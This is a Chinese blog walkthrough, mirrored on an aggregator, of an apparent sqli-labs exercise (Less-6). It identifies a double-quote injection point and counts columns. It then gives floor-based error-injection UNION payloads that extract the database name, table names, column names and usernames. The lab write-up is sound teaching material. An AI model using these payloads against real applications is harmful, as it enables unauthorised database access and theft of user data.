Less(6)
source link: http://www.cnblogs.com/meng-yu37/p/12080070.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
1.先判断注入类型
(1)首先看到要求,要求传一个ID参数,并且要求是数字型的;?id=1
(2)再输入?id=1'
(3)再输入?id=1 and 1=1
(4)再输入?id=1 and 1=2
(3)(4)界面一样,所以不是数字型
(5)再输入?id=1"
发现报错,我们加上--+,把后面注释掉
(6)输入: ?id=1" --+
接受的参数为id="1"
2..对列数进行判断
(1)输入?id=1") order by 3 --+
(2)输入?id=1") order by 4 --+
(3)为3列
3.因为页面正常的时候,均无输出部分,判断应该没有显示位,此时可尝试报错注入。
4.我们用floor进行注入
(1)注当前的数据库名:?id=-1" union select 1,count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x; --+
(2)爆注册表:?id=-1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema="security" limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; --+
(3)注某张表的字段,这里以users为例:?id=-1" union select 1,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; --+
(4)注字段的值,这里以users表里的username为例:?id=-1" union select 1,count(*),concat((select username from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; --+
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK